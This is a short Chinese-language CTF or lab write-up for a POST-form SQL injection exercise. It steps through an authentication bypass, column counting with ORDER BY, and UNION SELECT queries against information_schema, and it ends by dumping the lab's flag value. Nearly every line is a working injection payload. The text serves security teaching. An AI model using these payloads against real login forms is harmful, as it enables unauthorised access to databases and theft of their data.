POST注入
产生位置: form表单,登入
post注入与get注入没有本质区别
题目: http://inject2.lab.aqlab.cn:81/Pass-05/index.php
-
’ or 1=1#
#登入成功,存在注入 -
’ or 1=1 order by 1,2,3,4#
#4登入失败, 说明有3个字段 -
’ union select 1,2,3 #
#2,3显示成功,为查询点 -
’ union select 1,2,database()#
#显示库名 -
’ union select 1,table_name,3 from information_schema.tables where table_schema=database() #
#追加 limit 0,1 1,1
#得到表名’flag’ -
’ union select 1,column_name,3 from information_schema.columns where table_name=‘flag’ and table_schema=database() #
#追加 limit 0,1 1,1
#得到字段名’flag’ -
’ union select 1,flag,3 from flag limit 0,1#
#得到’flag’的数据:zKaQ-PostK1